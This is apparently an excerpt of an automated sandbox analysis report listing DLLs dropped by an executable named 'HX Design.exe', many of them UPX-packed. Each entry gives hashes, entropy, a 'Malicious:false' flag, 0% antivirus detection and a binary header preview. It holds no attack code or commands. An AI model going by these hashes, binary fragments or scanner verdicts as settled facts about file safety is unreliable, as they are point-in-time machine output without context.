                                                                                                                                                                                                                                                    SSDEEP:768:esvzuaVl+ztlrpqKgHrzwTzjT+KyH9qtztKnb3/+u2xmFepwUIJLV1/DU5YiSyvX:huaugLzUz+lOsnb33lUIJLV1i7SyFB
                                                                                                                                                                                                                                                    MD5:58FC4C56F7F400DE210E98CCB8FDC4B2
                                                                                                                                                                                                                                                    SHA1:12CB7EC39F3AF0947000295F4B50CBD6E7436554
                                                                                                                                                                                                                                                    SHA-256:DFC195EBB59DC5E365EFD3853D72897B8838497E15C0977B6EDB1EB347F13150
                                                                                                                                                                                                                                                    SHA-512:AD0C6A9A5CA719D244117984A06CCE8E59ED122855E4595DF242DF18509752429389C3A44A8BA0ABC817D61E37F64638CCBDFFC17238D4C38D2364F0A10E6BC7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).............d....................................................`.............................................H.................... .. ...................................................p..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):64272
                                                                                                                                                                                                                                                    Entropy (8bit):7.834005148796091
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:1536:Opx/sXWpBktLQ+ndnJZLIDdwXtRg1zk1+3XTkIJyPeB7SyFmhz:OXsXWpBgLBndJSdIgpk1+3XwIJyPeBrm
                                                                                                                                                                                                                                                    MD5:79879C679A12FAC03F472463BB8CEFF7
                                                                                                                                                                                                                                                    SHA1:B530763123BD2C537313E5E41477B0ADC0DF3099
                                                                                                                                                                                                                                                    SHA-256:8D1A21192112E13913CB77708C105034C5F251D64517017975AF8E0C4999EBA3
                                                                                                                                                                                                                                                    SHA-512:CA19DDAEFC9AB7C868DD82008A79EA457ACD71722FEC21C2371D51DCFDB99738E79EFF9B1913A306DBEDACB0540CA84A2EC31DC2267C7B559B6A98B390C5F3A7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~..............q...............................................q.......q......!u.............................................Rich....................PE..d.....g.........." ...).............J.......................................p............`.........................................Hl.......i.......`.......................l.......................................V..@...........................................UPX0....................................UPX1................................@....rsrc........`......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):120080
                                                                                                                                                                                                                                                    Entropy (8bit):7.901857200989369
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:DXHhVKXEI3D7AboLmJ2g+3FAZ9raGHT2PIJvqMkPp5:DX3gEcD/Ksg+3JGHC0kb
                                                                                                                                                                                                                                                    MD5:21D27C95493C701DFF0206FF5F03941D
                                                                                                                                                                                                                                                    SHA1:F1F124D4B0E3092D28BA4EA4FE8CF601D5BD8600
                                                                                                                                                                                                                                                    SHA-256:38EC7A3C2F368FFEB94524D7C66250C0D2DAFE58121E93E54B17C114058EA877
                                                                                                                                                                                                                                                    SHA-512:A5FBDA904024CD097A86D6926E0D593B0F7E69E32DF347A49677818C2F4CD7DC83E2BAB7C2507428328248BD2F54B00F7B2A077C8A0AAD2224071F8221CB9457
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j2U..\...\...\..s....\..]...\.._...\..X...\..Y...\...]...\..s]...\...].z.\..._...\...Q...\...\...\.......\...^...\.Rich..\.........................PE..d......g.........." ...).....0...... .....................................................`.....................................................................t+..........\....................................... ...@...........................................UPX0....................................UPX1.............~..................@....rsrc....0.......$..................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):36112
                                                                                                                                                                                                                                                    Entropy (8bit):7.6548425105220375
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:yzzaDWoin9vvSwNbHyxBpnrIJvIoS5YiSyvE62Em:yzOW6wNbHCrIJvIoQ7Syc6c
                                                                                                                                                                                                                                                    MD5:D6F123C4453230743ADCC06211236BC0
                                                                                                                                                                                                                                                    SHA1:9F9ADE18AC3E12BCC09757A3C4B5EE74CF5E794E
                                                                                                                                                                                                                                                    SHA-256:7A904FA6618157C34E24AAAC33FDF84035215D82C08EEC6983C165A49D785DC9
                                                                                                                                                                                                                                                    SHA-512:F5575D18A51207B4E9DF5BB95277D4D03E3BB950C0E7B6C3DD2288645E26E1DE8EDCF634311C21A6BDC8C3378A71B531F840B8262DB708726D36D15CB6D02441
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W.A.6...6...6...N%..6.......6.......6.......6.......6.......6...N...6.......6...6..26.......6.......6....I..6.......6..Rich.6..........PE..d......g.........." ...).P..........@........................................@............`.........................................|;..P....9.......0.......................;......................................@+..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):88336
                                                                                                                                                                                                                                                    Entropy (8bit):7.9108932581373015
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:1536:wlkdTJ3vEbPVfwGX+zD2z4qVHCy4N491I4lSi5j68Xi4az2yhIJ01uv7SyXN:wUFvEbdfwGOnqpCb491IK/EIJ01uvj
                                                                                                                                                                                                                                                    MD5:055EB9D91C42BB228A72BF5B7B77C0C8
                                                                                                                                                                                                                                                    SHA1:5659B4A819455CF024755A493DB0952E1979A9CF
                                                                                                                                                                                                                                                    SHA-256:DE342275A648207BEF9B9662C9829AF222B160975AD8925CC5612CD0F182414E
                                                                                                                                                                                                                                                    SHA-512:C5CBA050F4B805A299F5D04EC0DCE9B718A16BC335CAC17F23E96519DA0B9EAAF25AE0E9B29EF3DC56603BFE8317CDC1A67EE6464D84A562CF04BEA52C31CFAC
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,...,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..u,.V.,..-.V.,Rich.V.,................PE..d......g.........." ...). .......p........................................................`.........................................4...L....................0..........................................................@...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):27408
                                                                                                                                                                                                                                                    Entropy (8bit):7.449801379195215
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:he8SQ/XAVUI1ZCXG5oZa7gJX28IJ9U4NVTHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:he8XPAVhZwvpm8IJ9U4X5YiSyvTo2Et
                                                                                                                                                                                                                                                    MD5:513DCE65C09B3ABC516687F99A6971D8
                                                                                                                                                                                                                                                    SHA1:8F744C6F79A23AA380D9E6289CB4504B0E69FE3B
                                                                                                                                                                                                                                                    SHA-256:D4BE41574C3E17792A25793E6F5BF171BAEEB4255C08CB6A5CD7705A91E896FC
                                                                                                                                                                                                                                                    SHA-512:621F9670541CAC5684892EC92378C46FF5E1A3D065D2E081D27277F1E83D6C60510C46CAB333C6ED0FF81A25A1BDC0046C7001D14B3F885E25019F9CDD550ED0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...........-.........................................................................A...........Rich...................PE..d.....g.........." ...).0..........@.....................................................`.............................................L.......P............`..l...........<.......................................@...@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):45328
                                                                                                                                                                                                                                                    Entropy (8bit):7.729647917060796
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:BVO07RbhED2LEIuo4OCYkbaEts+ZIQivK+F8kp9jHIJywFmk5YiSyv+2Eb:zPkD2LEIuo4E5C30d1jHIJywFmu7Sy21
                                                                                                                                                                                                                                                    MD5:14392D71DFE6D6BDC3EBCDBDE3C4049C
                                                                                                                                                                                                                                                    SHA1:622479981E1BBC7DD13C1A852AE6B2B2AEBEA4D7
                                                                                                                                                                                                                                                    SHA-256:A1E39E2386634069070903E2D9C2B51A42CB0D59C20B7BE50EF95C89C268DEB2
                                                                                                                                                                                                                                                    SHA-512:0F6359F0ADC99EFAD5A9833F2148B066B2C4BAF564BA16090E04E2B4E3A380D6AFF4C9E7AEAA2BA247F020F7BD97635FCDFE4E3B11A31C9C6EA64A4142333424
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ll}.ll}.ll}...}.ll}..m|.ll}..o|.ll}..h|.ll}..i|.ll}..m|.ll}.lm}.ll}..m|.ll}..a|.ll}..l|.ll}..}.ll}..n|.ll}Rich.ll}........PE..d.....g.........." ...).p...........q....................................................`.........................................D...P....................0.......................................................}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60176
                                                                                                                                                                                                                                                    Entropy (8bit):7.847943448203495
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:1536:HqbxjT8JFLTgRG/dv8xxEOKI+C6IJvQl67SydP:KbFT8JZg+8xBd+XIJvQl6L
                                                                                                                                                                                                                                                    MD5:8CD40257514A16060D5D882788855B55
                                                                                                                                                                                                                                                    SHA1:1FD1ED3E84869897A1FAD9770FAF1058AB17CCB9
                                                                                                                                                                                                                                                    SHA-256:7D53DF36EE9DA2DF36C2676CFAEA84EE87E7E2A15AD8123F6ABB48717C3BC891
                                                                                                                                                                                                                                                    SHA-512:A700C3CE95CE1B3FD65A9F335C7C778643B2F7140920FE7EBF5D9BE1089BA04D6C298BF28427CA774FBF412D7F9B77F45708A8A0729437F136232E72D6231C34
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V...7.7.7.Oc..7...7.....7...7.....7.....7...7..O.7.7.6.....7...7.....7...7.Rich.7.........................PE..d......g.........." ...)............p-.......................................P............`..........................................K..P....I.......@.......................K......................................p9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):68368
                                                                                                                                                                                                                                                    Entropy (8bit):7.86108869046165
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:1536:knDFWlIqOuazwp1eBNcnYTpXZwWVfTwIJL7O497Sy5ArQ:+5MtOu89KYTXwEEIJL7OKjAQ
                                                                                                                                                                                                                                                    MD5:7EF27CD65635DFBA6076771B46C1B99F
                                                                                                                                                                                                                                                    SHA1:14CB35CE2898ED4E871703E3B882A057242C5D05
                                                                                                                                                                                                                                                    SHA-256:6EF0EF892DC9AD68874E2743AF7985590BB071E8AFE3BBF8E716F3F4B10F19B4
                                                                                                                                                                                                                                                    SHA-512:AC64A19D610448BADFD784A55F3129D138E3B697CF2163D5EA5910D06A86D0EA48727485D97EDBA3C395407E2CCF8868E45DD6D69533405B606E5D9B41BAADC0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......FM.^.,k..,k..,k..T...,k...j..,k...h..,k...o..,k...n..,k.J.j..,k...j..,k..,j..-k.ITj..,k.J.f..,k.J.k..,k.J....,k.J.i..,k.Rich.,k.................PE..d......g.........." ...).........P.......`...................................@............`.........................................l<..d....9.......0.......................<.......................................(..@...........................................UPX0.....P..............................UPX1.........`......................@....rsrc........0......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):21944
                                                                                                                                                                                                                                                    Entropy (8bit):4.7084462212093365
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xtLcOTWthWhWEXCVWQ4iWTKIjwX01k9z3A24hab2iNr:x5cgWthW+9HR9zp4hab2ur
                                                                                                                                                                                                                                                    MD5:9313C86E7BAE859F0174A1C8B6ABA58B
                                                                                                                                                                                                                                                    SHA1:DCE67FD1DA5DA8DC4BA406C544E55A83D6536CC9
                                                                                                                                                                                                                                                    SHA-256:AF9675AC90BAE8A0D8623F6FDAFF9D39E1B8810E8E46A5B044BAAA3396E745B3
                                                                                                                                                                                                                                                    SHA-512:2EC64FCE4A86BC52DC6C485FD94D203020617DF92698CA91AE25C4901984899E21C7DD92881EC52D6850EDFA547701AAB9B0CD1B8D076E6779B1A13324CDD3A4
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...GM.t.........." ...&.....0...............................................@.......m....`A........................................p...,............0...............0...%..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22080
                                                                                                                                                                                                                                                    Entropy (8bit):4.592452831045455
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xoWthWyWEXCVWQ4WWGwBj9BtaFFX01k9z3AufJzkKhH:xoWthWl49WR9z3fJn
                                                                                                                                                                                                                                                    MD5:854458AD55C39A9DFD1E350A51BE02B8
                                                                                                                                                                                                                                                    SHA1:5013CF58DE5A0B55E026ACE967E9842B3B131C2A
                                                                                                                                                                                                                                                    SHA-256:F918B0C45F59B2CB29F1EB3653D2F2679095E85E082A1198C933A76EDF1F33EF
                                                                                                                                                                                                                                                    SHA-512:FAA41A5031033F7E86EFEBC47777F915E95617F4B05D93833066C206D9C092855D8072C7BD142898F5A2BD1F94B646D98933302DDEB5A9CA0D5930C7B2241B98
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...f............." ...&.....0...............................................@....... ....`A........................................p................0...............0..@&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22080
                                                                                                                                                                                                                                                    Entropy (8bit):4.601301180304749
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xPWthWKWEXCVWQ4iWUhUVgiZTOebR5X01k9z3ACRsU2Owl:xPWthWdY9bt5R9zxRscI
                                                                                                                                                                                                                                                    MD5:7AD2034ACD0F296FE9EED320E5AD7591
                                                                                                                                                                                                                                                    SHA1:FE1B217E3F4567905968F7A3D48A7611E3CF3F7B
                                                                                                                                                                                                                                                    SHA-256:0D859A866D1BCEFE1A1BC5ADB88DCF2765567ECC31DFB4E472B512D033D88BB4
                                                                                                                                                                                                                                                    SHA-512:06D017B0EF9D081BC627F7F33D51EF2FE64E2CC5023204771032C4ED7BF26C0C6106B69D78F7BDD880FA59E8E4048B2DA8848784BC92D7780155DF140C952420
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d.....Z..........." ...&.....0...............................................@............`A........................................p................0...............0..@&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22096
                                                                                                                                                                                                                                                    Entropy (8bit):4.647021056323618
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xZXmxD3TsWthWEJWJWadJCsVWQ4fGWozCCJgiZTOebR5X01k9z3ACRsvA/hN:xZX0sWthWEoCs+8B9bt5R9zxRsM
                                                                                                                                                                                                                                                    MD5:12EA48CE605EBB204A21AE7D86DB3417
                                                                                                                                                                                                                                                    SHA1:5FB0FF9BA4105CD76EE4470AE4CAD0A39AE68C66
                                                                                                                                                                                                                                                    SHA-256:189BBBD739526A986E53518865E741CDE8C5967AACD5ED687408CEC3D8781F1C
                                                                                                                                                                                                                                                    SHA-512:39B486FB72C9DFF4E391673A872E957DBF0545D4D26914D0B0A475624E40B4FEEC3A9A17549E87BA806B1A90BF6F7784A187C506DAA1DB5201561CEF90FF6E81
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d....?............" ...&.....0...............................................@............`A........................................p................0...............0..P&..............p............................................................................rdata..H...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22096
                                                                                                                                                                                                                                                    Entropy (8bit):4.583973444067797
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:x9WthWaWJWadJCsVWQ46WecDtagQ5X01k9z3An/wynnXfO:x9WthWXCs3cDtdQ5R9zY/wynXfO
                                                                                                                                                                                                                                                    MD5:201FF3CD2FFE7D222F46574D4AC40A70
                                                                                                                                                                                                                                                    SHA1:B43F19BBB8FD1C8AA05BA67DEA38A7785DBE57B6
                                                                                                                                                                                                                                                    SHA-256:B83A71978215FDBA477C4EA61340168947A1021324D118E6B7159054985F2D1A
                                                                                                                                                                                                                                                    SHA-512:3F99D7B501C1DB470A6D91AF856EBBEDE05522ACB5763D928F4FB28C74DB2339B46DF108745ED8EBD8C6C1298D9495358C245D188F055638B0D6DD568FA596D2
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...D............." ...&.....0...............................................@.......3....`A........................................p................0...............0..P&..............p............................................................................rdata..`...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):26040
                                                                                                                                                                                                                                                    Entropy (8bit):4.8520631205553
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xRwhDPvVr8rFTsvWthWsWEXCVWQ4iW73KIjwX01k9z3A24haCIa6PAWw1:xaJPvVrhWthWXFHR9zp4hasB
                                                                                                                                                                                                                                                    MD5:4B328F140A3AE7FEDB21CA50CC23D938
                                                                                                                                                                                                                                                    SHA1:9E71B4C2CF030A644D2050188C4B77E638C0EE14
                                                                                                                                                                                                                                                    SHA-256:E55B200643E8B078E7F5EB0C97DE44FEAD21B11D06590EBEDBCB84214D063345
                                                                                                                                                                                                                                                    SHA-512:4C349F45CA4DB4F1247AA405E5627F22B7CCFE66234D8D970475E71471EBB251F7A0F781A33D0E4EC893F86653B0A1C8508ADF576E923D0CE86B43F552204614
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...d..u.........." ...&.....@...............................................P......#=....`A........................................p...x............@...............@...%..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22056
                                                                                                                                                                                                                                                    Entropy (8bit):4.608645300170232
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xPIkMRmKjoRWthWaWEXCVWQ4KWiGfpfKUSIX01k9z3ABw8FcT:xgKRWthWNLWF2IR9zT8FcT
                                                                                                                                                                                                                                                    MD5:4A060EEC454C222A5381CD359DC00B81
                                                                                                                                                                                                                                                    SHA1:21E1BC115D04A74779E955EA16A16BD71454D9BB
                                                                                                                                                                                                                                                    SHA-256:E6B2B05E14A6C6F5381E8F4C7F4FD28A499246FB4C8EAFE1F08014B9273D70DF
                                                                                                                                                                                                                                                    SHA-512:16FB1F4CCDAD05D07FEB62E0CD078401F4023F9FAB0FB15E52B927CA413E65EB32C2932BA59DBFA7F7EE0E8A8053748E27F2757E82E600DB812271AA44A9433C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d................." ...&.....0...............................................@.......6....`A........................................p...L............0...............0..(&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):20960
                                                                                                                                                                                                                                                    Entropy (8bit):4.41968362445382
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:lC+WvhWRWYnO/VWQ4SWHvD480Hy5qnajsBkffy2:4+WvhWRUGEslECl
                                                                                                                                                                                                                                                    MD5:50ABF0A7EE67F00F247BADA185A7661C
                                                                                                                                                                                                                                                    SHA1:0CDDAC9AC4DB3BF10A11D4B79085EF9CB3FB84A1
                                                                                                                                                                                                                                                    SHA-256:F957A4C261506484B53534A9BE8931C02EC1A349B3F431A858F8215CECFEC3F7
                                                                                                                                                                                                                                                    SHA-512:C2694BB5D103BAFF1264926A04D2F0FE156B8815A23C3748412A81CC307B71A9236A0E974B5549321014065E393D10228A0F0004DF9BA677F03B5D244A64B528
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d.....mR.........." .........0...............................................@............`A........................................p................0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
